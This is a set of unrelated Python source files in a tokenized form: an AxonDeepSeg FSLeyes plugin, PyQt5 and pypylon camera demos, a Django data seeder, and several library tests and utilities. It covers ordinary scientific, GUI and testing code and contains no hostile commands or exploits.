stats_array,index_image_array=compute_morphs.get_axon_morphometrics(im_axon=pred_axon im_myelin=pred_myelin pixel_size=pixel_size axon_shape=self.settings.axon_shape return_index_image=<true>)<for_stmt>stats stats_array<block_start>x=np.append(x np.array([(stats['x0'] stats['y0'] stats['gratio'] stats['axon_area'] stats['axon_perimeter'] stats['myelin_area'] stats['axon_diam'] stats['myelin_thickness'] stats['axonmyelin_area'] stats['axonmyelin_perimeter'] stats['solidity'] stats['eccentricity'] stats['orientation'])] dtype=x.dtype))<block_end><with_stmt>wx.FileDialog(self "Save morphometrics file" wildcard="Excel files (*.xlsx)|*.xlsx" defaultFile="axon_morphometrics.xlsx" style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)<as>fileDialog<block_start><if_stmt>fileDialog.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end># the user changed their mind
# save the current contents in the file
pathname=fileDialog.GetPath()<if_stmt><not>(pathname.lower().endswith((".xlsx" ".csv")))# If the user didn't add the extension, add it here
<block_start>pathname=pathname+".xlsx"<block_end><try_stmt># Export to excel
<block_start>pd.DataFrame(x).to_excel(pathname)<block_end><except_stmt>IOError<block_start>wx.LogError("Cannot save current data in file '%s'."%pathname)<block_end><block_end># Generate and load the index image
original_image_name=(axon_mask_overlay.name).split("-axon")[0]<line_sep>original_image_name=original_image_name.split("_seg")[0]<line_sep>index_outfile=Path(pathname).parents[0]/(original_image_name+str(index_suffix))<line_sep>ads_utils.imwrite(index_outfile index_image_array)<line_sep>self.load_png_image_from_path(index_outfile is_mask=<false> colormap="yellow")<line_sep># Generate the colored image with indexes
axon_array,myelin_array=postprocessing.remove_intersection(axon_array<floordiv>255 myelin_array<floordiv>255)<line_sep>axonmyelin_image=axon_array<times>params.intensity["axon"]+myelin_array<times>params.intensity["myelin"]<line_sep>axonmyelin_outfile=self.ads_temp_dir/axonmyelin_suffix<line_sep>ads_utils.imwrite(axonmyelin_outfile axonmyelin_image)<line_sep>postprocessing.generate_and_save_colored_image_with_index_numbers(filename=Path(pathname).parents[0]/(original_image_name+str(axonmyelin_index_suffix)) axonmyelin_image_path=axonmyelin_outfile index_image_array=index_image_array)<line_sep><return><block_end><def_stmt>get_watershed_segmentation self im_axon im_myelin return_centroids=<false><block_start>"""
Parts of this function were copied from the code found in this document:
https://github.com/neuropoly/axondeepseg/blob/master/AxonDeepSeg/morphometrics/compute_morphometrics.py
In the future, the referenced script should be modified in order to avoid repetition.
:param im_axon: the binary mask corresponding to axons
:type im_axon: ndarray
:param im_myelin: the binary mask corresponding to the myelin
:type im_myelin: ndarray
:param return_centroids: (optional) if this is set to true, the function will also return the centroids of the
axon objects as a list of tuples
:type return_centroids: bool
:return: the label corresponding to the axon+myelin objects
:rtype: ndarray
"""<line_sep># Label each axon object
im_axon_label=measure.label(im_axon)<line_sep># Measure properties for each axon object
axon_objects=measure.regionprops(im_axon_label)<line_sep># Deal with myelin mask
<if_stmt>im_myelin<is><not><none># sum axon and myelin masks
<block_start>im_axonmyelin=im_axon+im_myelin<line_sep># Compute distance between each pixel and the background. Note: this distance is calculated from the im_axon,
# not from the im_axonmyelin image, because we know that each axon object is already isolated, therefore the
# distance metric will be more useful for the watershed algorithm below.
distance=ndi.distance_transform_edt(im_axon)<line_sep># local_maxi = feature.peak_local_max(distance, indices=False, footprint=np.ones((31, 31)), labels=axonmyelin)
# Get axon centroid as int (not float) to be used as index
ind_centroid=([int(props.centroid[0])<for>props axon_objects] [int(props.centroid[1])<for>props axon_objects] )<line_sep># Create an image with axon centroids, which value corresponds to the value of the axon object
im_centroid=np.zeros_like(im_axon dtype="uint16")<for_stmt>i range(len(ind_centroid[0]))# Note: The value "i" corresponds to the label number of im_axon_label
<block_start>im_centroid[ind_centroid[0][i] ind_centroid[1][i]]=i+1<block_end># Watershed segmentation of axonmyelin using distance map
im_axonmyelin_label=morphology.watershed(-distance im_centroid mask=im_axonmyelin)<if_stmt>return_centroids<is><true><block_start><return>im_axonmyelin_label ind_centroid<block_end><else_stmt><block_start><return>im_axonmyelin_label<block_end><block_end><block_end><def_stmt>load_png_image_from_path self image_path is_mask=<false> add_to_overlayList=<true> colormap="greyscale"<block_start>"""
This function converts a 2D image into a NIfTI image and loads it as an overlay.
The parameter add_to_overlayList allows to display the overlay into FSLeyes.
:param image_path: The location of the image, including the name and the .extension
:type image_path: Path
:param is_mask: (optional) Whether or not this is a segmentation mask. It will be treated as a normal
image by default.
:type is_mask: bool
:param add_to_overlayList: (optional) Whether or not to add the image to the overlay list. If so, the image will
be displayed in the application. This parameter is True by default.
:type add_to_overlayList: bool
:param colormap: (optional) the colormap of image that will be displayed. This parameter is set to greyscale by
default.
:type colormap: string
:return: the FSLeyes overlay corresponding to the loaded image.
:rtype: overlay
"""<line_sep># Open the 2D image
img_png2D=ads_utils.imread(image_path)<if_stmt>is_mask<is><true><block_start>img_png2D=img_png2D<floordiv>params.intensity['binary']<block_end># Segmentation masks should be binary
# Flip the image on the Y axis so that the morphometrics file shows the right coordinates
img_png2D=np.flipud(img_png2D)<line_sep># Convert image data into a NIfTI image
# Note: PIL and NiBabel use different axis conventions, so some array manipulation has to be done.
img_NIfTI=nib.Nifti1Image(np.rot90(img_png2D k=1 axes=(1 0)) np.eye(4))<line_sep># Save the NIfTI image in a temporary directory
img_name=image_path.stem<line_sep>out_file=self.ads_temp_dir.__str__()+"/"+img_name+".nii.gz"<line_sep>nib.save(img_NIfTI out_file)<line_sep># Load the NIfTI image as an overlay
img_overlay=ovLoad.loadOverlays(paths=[out_file] inmem=<true> blocking=<true>)[0]<line_sep># Display the overlay
<if_stmt>add_to_overlayList<is><true><block_start>self.overlayList.append(img_overlay)<line_sep>opts=self.displayCtx.getOpts(img_overlay)<line_sep>opts.cmap=colormap<block_end><return>img_overlay<block_end><def_stmt>get_visible_overlays self<block_start>"""
This function returns a list containing every overlay that is visible in FSLeyes.
:return: The list of the visible overlays
:rtype: list
"""<line_sep>visible_overlay_list=[]<for_stmt>an_overlay self.overlayList<block_start>an_overlay_display=self.displayCtx.getDisplay(an_overlay)<if_stmt>an_overlay_display.enabled<is><true><block_start>visible_overlay_list.append(an_overlay)<block_end><block_end><return>visible_overlay_list<block_end><def_stmt>get_visible_image_overlay self<block_start>"""
This function is used to find the active microscopy image. This image should be visible and should NOT have the
following keywords in its name: axon, myelin, Myelin, watershed, Watershed.
:return: The visible microscopy image
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>image_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><if_stmt>visible_overlay_list.__len__()<is>1<block_start><return>visible_overlay_list[0]<block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(("watershed"<not><in>an_overlay.name)<and>("Watershed"<not><in>an_overlay.name)<and>(<not>an_overlay.name.endswith("-myelin"))<and>(<not>an_overlay.name.endswith("-Myelin"))<and>(<not>an_overlay.name.endswith("-Axon"))<and>(<not>an_overlay.name.endswith("-axon")))<block_start>n_found_overlays=n_found_overlays+1<line_sep>image_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one microscopy image has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible microscopy image has been found")<line_sep><return><none><block_end><return>image_overlay<block_end><def_stmt>get_visible_axon_overlay self<block_start>"""
This method finds the currently visible axon overlay
:return: The visible overlay that corresponds to the axon mask
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>axon_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-axon"))<or>(an_overlay.name.endswith("-Axon"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>axon_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one axon mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible axon mask has been found")<line_sep><return><none><block_end><return>axon_overlay<block_end><def_stmt>get_corrected_axon_overlay self<block_start>"""
This method finds the visible corrected axon overlay, if it exists
:return: The visible corrected axon overlay
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>axon_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-axon-corr"))<or>(an_overlay.name.endswith("-Axon-corr"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>axon_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one corrected axon mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start><return><none><block_end><return>axon_overlay<block_end><def_stmt>get_visible_myelin_overlay self<block_start>"""
This method finds the currently visible myelin overlay
:return: The visible overlay that corresponds to the myelin mask
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>myelin_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-myelin"))<or>(an_overlay.name.endswith("-Myelin"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>myelin_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one myelin mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible myelin mask has been found")<line_sep><return><none><block_end><return>myelin_overlay<block_end><def_stmt>show_message self message caption="Error"<block_start>"""
This function is used to show a popup message on the FSLeyes interface.
:param message: The message to be displayed.
:type message: String
:param caption: (Optional) The caption of the message box.
:type caption: String
"""<with_stmt>wx.MessageDialog(self message caption=caption style=wx.OK|wx.CENTRE pos=wx.DefaultPosition )<as>msg<block_start>msg.ShowModal()<block_end><block_end><def_stmt>verrify_version self<block_start>"""
This function checks if the plugin version is the same as the one in the AxonDeepSeg directory
"""<line_sep>ads_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>plugin_path_parts=ads_path.parts[:-1]<line_sep>plugin_path=Path(*plugin_path_parts)<line_sep>plugin_file=plugin_path/"ads_plugin.py"<line_sep># Check if the plugin file exists
plugin_file_exists=plugin_file.exists()<if_stmt>plugin_file_exists<is><false><block_start><return><block_end># Check the version of the plugin
<with_stmt>open(plugin_file.__str__())<as>plugin_file_reader<block_start>plugin_file_lines=plugin_file_reader.readlines()<block_end>plugin_file_lines=[x.strip()<for>x plugin_file_lines]<line_sep>version_line='VERSION = "'+VERSION+'"'<line_sep>plugin_is_up_to_date=<true><line_sep>version_found=<false><line_sep><for_stmt>lines plugin_file_lines<block_start><if_stmt>(lines.startswith("VERSION = "))<block_start>version_found=<true><if_stmt><not>(lines<eq>version_line)<block_start>plugin_is_up_to_date=<false><block_end><block_end><block_end><if_stmt>(version_found<is><false>)<or>(plugin_is_up_to_date<is><false>)<block_start>message=("A more recent version of the AxonDeepSeg plugin was found in your AxonDeepSeg installation folder. "<concat>"You will need to replace the current FSLeyes plugin with the new one. "<concat>"To proceed, go to: file -> load plugin -> ads_plugin.py. Then, restart FSLeyes.")<line_sep>self.show_message(message "Warning")<block_end><return><block_end>
This function returns the AxonDeepSeg paper citation.
:return: The AxonDeepSeg citation
:rtype: string
"""<line_sep><return>("If you use this work in your research, please cite it as follows: \n"<concat>"<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018). "<concat>"AxonDeepSeg: automatic axon and myelin segmentation from microscopy data using convolutional "<concat>"neural networks. Scientific Reports, 8(1), 3816. "<concat>"Link to paper: https://doi.org/10.1038/s41598-018-22181-4. \n"<concat>"Copyright (c) 2018 NeuroPoly (Polytechnique Montreal)")<block_end><def_stmt>get_logo self<block_start>"""
This function finds the AxonDeepSeg logo saved as a png image and returns it as a wx bitmap image.
:return: The AxonDeepSeg logo
:rtype: wx.StaticBitmap
"""<line_sep>ads_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>logo_file=ads_path/"logo_ads-alpha_small.png"<line_sep>png=wx.Image(str(logo_file) wx.BITMAP_TYPE_ANY).ConvertToBitmap()<line_sep>png.SetSize((png.GetWidth() png.GetHeight()))<line_sep>logo_image=wx.StaticBitmap(self -1 png wx.DefaultPosition (png.GetWidth() png.GetHeight()))<line_sep><return>logo_image<block_end>@staticmethod<def_stmt>supportedViews <block_start>"""
Return the FSLeyes view types this control panel supports (only the OrthoPanel).
"""<import_from_stmt>fsleyes.views.orthopanel OrthoPanel<line_sep><return>[OrthoPanel]<block_end>@staticmethod<def_stmt>defaultLayout <block_start>"""
This method makes the control panel appear on the left of the FSLeyes window.
"""<line_sep><return>{"location":wx.LEFT}<block_end><block_end>
|
<import_from_stmt>PyQt5 QtWidgets<as>qtw<import_from_stmt>PyQt5 QtCore<as>qtc<import_from_stmt>PyQt5 QtMultimedia<as>qtmm<import_from_stmt>PyQt5 QtMultimediaWidgets<as>qtmmw<class_stmt>MainWindow(qtw.QWidget)<block_start><def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.setLayout(qtw.QVBoxLayout())<line_sep># camera
self.camera=qtmm.QCamera()<line_sep># viewfinder
cvf=qtmmw.QCameraViewfinder()<line_sep>self.camera.setViewfinder(cvf)<line_sep>self.layout().addWidget(cvf)<line_sep># Form
form=qtw.QFormLayout()<line_sep>self.layout().addLayout(form)<line_sep># zoom
zoomslider=qtw.QSlider(minimum=1 maximum=10 sliderMoved=self.on_slider_moved orientation=qtc.Qt.Horizontal)<line_sep>form.addRow('Zoom' zoomslider)<line_sep>self.camera.start()<line_sep>self.show()<block_end><def_stmt>on_slider_moved self value<block_start>focus=self.camera.focus()<line_sep>focus.zoomTo(1 value)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=qtw.QApplication([])<line_sep>mw=MainWindow()<line_sep>app.exec()<block_end>
|
<import_from_stmt>django.apps AppConfig<import_from_stmt>django.db.models.signals post_migrate<class_stmt>BinpropertyConfig(AppConfig)<block_start>name='binproperty'<def_stmt>ready self<block_start>post_migrate.connect(do_init_data sender=self)<block_end><block_end><def_stmt>do_init_data sender **kwargs<block_start>init_category()<block_end><def_stmt>init_category <block_start>"""
:return:None
"""<try_stmt><block_start><import_from_stmt>.models ListModel<as>ls<if_stmt>ls.objects.filter(openid__iexact='init_data').exists()<block_start><if_stmt>ls.objects.filter(openid__iexact='init_data').count()<ne>4<block_start>ls.objects.filter(openid__iexact='init_data').delete()<line_sep>init_data=[ls(id=1 openid='init_data' bin_property='Damage' creater='GreaterWMS') ls(id=2 openid='init_data' bin_property='Inspection' creater='GreaterWMS') ls(id=3 openid='init_data' bin_property='Normal' creater='GreaterWMS') ls(id=4 openid='init_data' bin_property='Holding' creater='GreaterWMS')]<line_sep>ls.objects.bulk_create(init_data batch_size=100)<block_end><block_end><else_stmt><block_start>init_data=[ls(id=1 openid='init_data' bin_property='Damage' creater='GreaterWMS') ls(id=2 openid='init_data' bin_property='Inspection' creater='GreaterWMS') ls(id=3 openid='init_data' bin_property='Normal' creater='GreaterWMS') ls(id=4 openid='init_data' bin_property='Holding' creater='GreaterWMS')]<line_sep>ls.objects.bulk_create(init_data batch_size=100)<block_end><block_end><except_stmt><block_start><pass><block_end><block_end>
|
# Note: Before getting started, Basler recommends reading the Programmer's Guide topic
# in the pylon C++ API documentation that gets installed with pylon.
# If you are upgrading to a higher major version of pylon, Basler also
# strongly recommends reading the Migration topic in the pylon C++ API documentation.
# This sample illustrates how to use the image format
# converter class CImageFormatConverter.
# The image format converter accepts all image formats
# produced by Basler camera devices and it is able to
# convert these to a number of output formats.
# The conversion can be controlled by several parameters.
# See the converter class documentation for more details.
<import_from_stmt>pypylon pylon<import_from_stmt>pypylon genicam<line_sep># This is a helper function for showing an image on the screen if Windows is used,
# and for printing the first bytes of the image.
<def_stmt>show_image image message<block_start>print(message)<line_sep>pBytes=image.Array<line_sep>print("Bytes of the image: \n")<line_sep>print(pBytes)<block_end><try_stmt># Create the converter and set parameters.
<block_start>converter=pylon.ImageFormatConverter()<line_sep>converter.OutputPixelFormat=pylon.PixelType_Mono8<line_sep># Try to get a grab result for demonstration purposes.
print("Waiting for an image to be grabbed.")<try_stmt><block_start>camera=pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())<line_sep>grabResult=camera.GrabOne(1000)<line_sep>show_image(grabResult "Grabbed image.")<line_sep>targetImage=pylon.PylonImage.Create(pylon.PixelType_Mono8 grabResult.GetWidth() grabResult.GetHeight())<line_sep>print(converter.IsSupportedOutputFormat(pylon.PixelType_Mono8))<line_sep># Now we can check if conversion is required.
<if_stmt>converter.ImageHasDestinationFormat(grabResult)# No conversion is needed. It can be skipped for saving processing
# time.
<block_start>show_image(grabResult "Grabbed image.")<block_end><else_stmt># Conversion is needed.
<block_start>show_image(grabResult "Grabbed image.")<line_sep>show_image(targetImage "Converted image.")<block_end><block_end><except_stmt>genicam.GenericException<as>e<block_start>print("Could not grab an image: " e.GetDescription())<block_end><block_end><except_stmt>genicam.GenericException<as>e<block_start>print("An exception occurred. " e.GetDescription())<block_end>
|
<import_stmt>unittest<import_from_stmt>zoomus components util<import_stmt>responses<def_stmt>suite <block_start>"""Define all the tests of the module."""<line_sep>suite=unittest.TestSuite()<line_sep>suite.addTest(unittest.makeSuite(UpdateV2TestCase))<line_sep><return>suite<block_end><class_stmt>UpdateV2TestCase(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.component=components.live_stream.LiveStreamComponentV2(base_uri="http://foo.com" config={"api_key":"KEY" "api_secret":"SECRET" "version":util.API_VERSION_2 } )<block_end>@responses.activate<def_stmt>test_can_update self<block_start>responses.add(responses.PATCH "http://foo.com/meetings/42/livestream")<line_sep>response=self.component.update(meeting_id="42" stream_url="https://foo.bar" stream_key="12345")<line_sep>self.assertEqual(response.request.body '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}' )<block_end>@responses.activate<def_stmt>test_can_update_wildcard self<block_start>responses.add(responses.PATCH "http://foo.com/meetings/42/livestream")<line_sep>data={"meeting_id":"42" "stream_url":"https://foo.bar" "stream_key":"12345" }<line_sep>response=self.component.update(**data)<line_sep>self.assertEqual(response.request.body '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}' )<block_end><def_stmt>test_requires_meeting_id self<block_start><with_stmt>self.assertRaises(ValueError)<as>context<block_start>self.component.update()<line_sep>self.assertEqual(context.exception.message "'meeting_id' must be set")<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
|
'''Autogenerated by xml_generate script, do not edit!'''<import_from_stmt>OpenGL platform<as>_p arrays<line_sep># Code generation uses this
<import_from_stmt>OpenGL.raw.GLES2 _types<as>_cs<line_sep># End users want this...
<import_from_stmt>OpenGL.raw.GLES2._types *<import_from_stmt>OpenGL.raw.GLES2 _errors<import_from_stmt>OpenGL.constant Constant<as>_C<import_stmt>ctypes<line_sep>_EXTENSION_NAME='GLES2_EXT_render_snorm'<def_stmt>_f function<block_start><return>_p.createFunction(function _p.PLATFORM.GLES2 'GLES2_EXT_render_snorm' error_checker=_errors._error_checker)<block_end>GL_BYTE=_C('GL_BYTE' 0x1400)<line_sep>GL_R16_SNORM_EXT=_C('GL_R16_SNORM_EXT' 0x8F98)<line_sep>GL_R8_SNORM=_C('GL_R8_SNORM' 0x8F94)<line_sep>GL_RG16_SNORM_EXT=_C('GL_RG16_SNORM_EXT' 0x8F99)<line_sep>GL_RG8_SNORM=_C('GL_RG8_SNORM' 0x8F95)<line_sep>GL_RGBA16_SNORM_EXT=_C('GL_RGBA16_SNORM_EXT' 0x8F9B)<line_sep>GL_RGBA8_SNORM=_C('GL_RGBA8_SNORM' 0x8F97)<line_sep>GL_SHORT=_C('GL_SHORT' 0x1402)<line_sep>
|
<import_from_stmt>typing Any Dict<import_from_stmt>uuid UUID<import_from_stmt>eventsourcing.application Application<import_from_stmt>eventsourcing.examples.aggregate8.domainmodel Dog Snapshot<import_from_stmt>eventsourcing.examples.aggregate8.persistence OrjsonTranscoder PydanticMapper <import_from_stmt>eventsourcing.persistence Mapper Transcoder<class_stmt>DogSchool(Application)<block_start>env={"AGGREGATE_CACHE_MAXSIZE":"50" "DEEPCOPY_FROM_AGGREGATE_CACHE":"n" "IS_SNAPSHOTTING_ENABLED":"y" }<line_sep>snapshot_class=Snapshot<def_stmt>register_dog self name:str<arrow>UUID<block_start>dog=Dog(name)<line_sep>self.save(dog)<line_sep><return>dog.id<block_end><def_stmt>add_trick self dog_id:UUID trick:str<arrow><none><block_start>dog:Dog=self.repository.get(dog_id)<line_sep>dog.add_trick(trick)<line_sep>self.save(dog)<block_end><def_stmt>get_dog self dog_id:UUID<arrow>Dict[str Any]<block_start>dog:Dog=self.repository.get(dog_id)<line_sep><return>{"name":dog.name "tricks":tuple(dog.tricks)}<block_end><def_stmt>construct_mapper self<arrow>Mapper<block_start><return>self.factory.mapper(transcoder=self.construct_transcoder() mapper_class=PydanticMapper )<block_end><def_stmt>construct_transcoder self<arrow>Transcoder<block_start><return>OrjsonTranscoder()<block_end><block_end>
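# Hedged usage sketch (added for illustration; not part of the original module). It drives the DogSchool
# application with its default in-memory infrastructure; the dog name and trick are assumptions.
school=DogSchool()<line_sep>dog_id=school.register_dog("Fido")<line_sep>school.add_trick(dog_id "roll over")<line_sep>print(school.get_dog(dog_id))# expected: {'name': 'Fido', 'tricks': ('roll over',)}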
|
<import_from_future_stmt> print_function<import_stmt>pytest<import_from_stmt>keras_contrib.utils.test_utils is_tf_keras<import_from_stmt>keras_contrib.tests optimizers<import_from_stmt>keras_contrib.optimizers ftml<line_sep>@pytest.mark.xfail(is_tf_keras reason='TODO fix this.' strict=<true>)<def_stmt>test_ftml <block_start>optimizers._test_optimizer(ftml())<line_sep>optimizers._test_optimizer(ftml(lr=0.003 beta_1=0.8 beta_2=0.9 epsilon=1e-5 decay=1e-3))<block_end>
|
"""Demo of Open3D 0.10.0 Slowdown
Please modify DIRECTORY to point to the folder of meshes attached to this issue reply
"""<import_stmt>os<import_stmt>open3d<as>o3d<import_stmt>copy<line_sep>DIRECTORY='fixtures/o3d_slow_down'<line_sep># o3d 0.10.0 - 9 Seconds to load meshes (time to being user interation), 1 FPS (with draw edges enabled 'w')
# o3d 0.11.0+f1d478c4 - 0.5 seconds, 45-60 FPS (with draw edges)
duplicate=50<def_stmt>main <block_start>all_meshes=[]<line_sep>all_files=sorted(list(os.listdir(DIRECTORY)))<for_stmt>filename all_files<block_start>print(filename)<line_sep>mesh=o3d.io.read_triangle_mesh(os.path.join(DIRECTORY filename))<line_sep>all_meshes.extend([copy.deepcopy(mesh)<for>i range(duplicate)])<block_end>print(len(all_meshes))<line_sep>o3d.visualization.draw_geometries(all_meshes)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
#
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
<import_stmt>unittest<import_stmt>stcgal.ihex<class_stmt>IHEXTests(unittest.TestCase)<block_start>"""Tests for IHEX reader"""<def_stmt>test_simple self<block_start>"""Test reading a basic, valid file"""<line_sep>lines=[b":0B00000068656C6C6F5F776F726C645A" b":00000001FF"]<line_sep>bindata=stcgal.ihex.IHex.read(lines).extract_data()<line_sep>self.assertEqual(bindata b"hello_world")<block_end><def_stmt>test_empty self<block_start>"""Test reading an empty file"""<line_sep>lines=[]<line_sep>bindata=stcgal.ihex.IHex.read(lines).extract_data()<line_sep>self.assertEqual(bindata b"")<block_end><def_stmt>test_invalid self<block_start>"""Test invalid encoded data"""<line_sep>lines=[":abc"]<with_stmt>self.assertRaises(ValueError)<block_start>stcgal.ihex.IHex.read(lines)<block_end><block_end><def_stmt>test_roundtrip self<block_start>"""Test round-trip through encoder/decoder"""<line_sep>bindata=b"12345678"<for_stmt>mode (8 16 32)<block_start><with_stmt>self.subTest(mode)<block_start>hexer=stcgal.ihex.IHex()<line_sep>hexer.set_mode(mode)<line_sep>hexer.insert_data(0 bindata)<line_sep>encoded=hexer.write().encode("ASCII").splitlines()<line_sep>decoded=stcgal.ihex.IHex.read(encoded).extract_data()<line_sep>self.assertEqual(decoded bindata)<block_end><block_end><block_end><block_end>
|
<import_stmt>foundations<import_stmt>sys<line_sep>foundations.log_metric("Task" sys.argv[1])<line_sep>
|
<import_stmt>re<line_sep>"""
Module containing types used in the communication with herbstluftwm;
primarily, types used in attributes.
"""<class_stmt>Point<block_start>"""
A point on the 2D plane
"""<def_stmt>__init__ self x=0 y=0<block_start>self.x=x<line_sep>self.y=y<block_end><def_stmt>__add__ self other<block_start><return>Point(self.x+other.x self.y+other.y)<block_end><def_stmt>__sub__ self other<block_start><return>Point(self.x-other.x self.y-other.y)<block_end><def_stmt>__mul__ self scalar<block_start>"""multiply with a given scalar"""<line_sep><return>Point(self.x<times>scalar self.y<times>scalar)<block_end><def_stmt>__floordiv__ self scalar<block_start>"""divide by scalar factor, forcing to integer coordinates"""<line_sep><return>Point(self.x<floordiv>scalar self.y<floordiv>scalar)<block_end><def_stmt>__eq__ self other<block_start><return>self.x<eq>other.x<and>self.y<eq>other.y<block_end><def_stmt>__repr__ self<arrow>str<block_start><return>f'Point({self.x}, {self.y})'<block_end><block_end><class_stmt>Rectangle<block_start>"""
A rectangle on the screen, defined by its size and its distance to
the top left screen corner.
"""<def_stmt>__init__ self x=0 y=0 width=0 height=0<block_start>self.x=x<line_sep>self.y=y<line_sep>self.width=width<line_sep>self.height=height<block_end><def_stmt>__str__ self<block_start><return>f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'<block_end><def_stmt>__repr__ self<block_start><return>f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'<block_end><def_stmt>__eq__ self other<block_start><return>self.x<eq>other.x<and>self.y<eq>other.y<and>self.width<eq>other.width<and>self.height<eq>other.height<block_end><def_stmt>to_user_str self<block_start><return>"%dx%d%+d%+d"%(self.width self.height self.x self.y)<block_end>@staticmethod<def_stmt>from_user_str string<block_start>reg='([0-9]+)x([0-9]+)([+-][0-9]+)([+-][0-9]+)'<line_sep>m=re.match(reg string)<if_stmt>m<is><none><block_start><raise>Exception(f'"{string}" is not in format {reg}')<block_end>w=int(m.group(1))<line_sep>h=int(m.group(2))<line_sep>x=int(m.group(3))<line_sep>y=int(m.group(4))<line_sep><return>Rectangle(x y w h)<block_end><def_stmt>adjusted self dx=0 dy=0 dw=0 dh=0<block_start>"""return a new rectangle whose components
are adjusted by the provided deltas.
"""<line_sep><return>Rectangle(self.x+dx self.y+dy self.width+dw self.height+dh)<block_end><def_stmt>topleft self<arrow>Point<block_start>"""the top left corner of the rectangle"""<line_sep><return>Point(self.x self.y)<block_end><def_stmt>bottomright self<arrow>Point<block_start>"""the bottom right corner of the rectangle"""<line_sep><return>Point(self.x+self.width self.y+self.height)<block_end><def_stmt>center self<arrow>Point<block_start>"""the center of the rectangle, forced to integer coordinates"""<line_sep><return>self.topleft()+self.size()<floordiv>2<block_end><def_stmt>size self<arrow>Point<block_start>"""width and height of the rectangle"""<line_sep><return>Point(self.width self.height)<block_end><block_end><class_stmt>HlwmType<block_start>"""
Wrapper functions for converting between python types and types
in herbstluftwm.
"""<def_stmt>__init__ self name from_user_str to_user_str is_instance# a hlwm type should define the following
<block_start>self.name=name# type: str
# a callback for parsing
self.from_user_str=from_user_str# of type: str -> T
# a callback for printing
self.to_user_str=to_user_str# of type: T -> str
# a predicate whether a python variable has this type:
self.is_instance=is_instance<block_end># of type: Anything -> bool
@staticmethod<def_stmt>by_name type_name<block_start>"""Given the full name of a hlwm type, return the
corresponding HlwmType metadata object, or None if
no type with that name exists"""<for_stmt>t hlwm_types()<block_start><if_stmt>t.name<eq>type_name<block_start><return>t<block_end><block_end><return><none><block_end>@staticmethod<def_stmt>by_type_of_variable python_variable<block_start>"""Given a variable, detect its type
"""<for_stmt>t hlwm_types()<block_start><if_stmt>t.is_instance(python_variable)<block_start><return>t<block_end><block_end><return><none><block_end><block_end><def_stmt>hlwm_types <block_start>"""
Return a list of HlwmType objects.
Unfortunately, the order matters for the is_instance() predicate: Here, the
first matching type in the list must be used. (This is because
`isinstance(True, int)` is true)
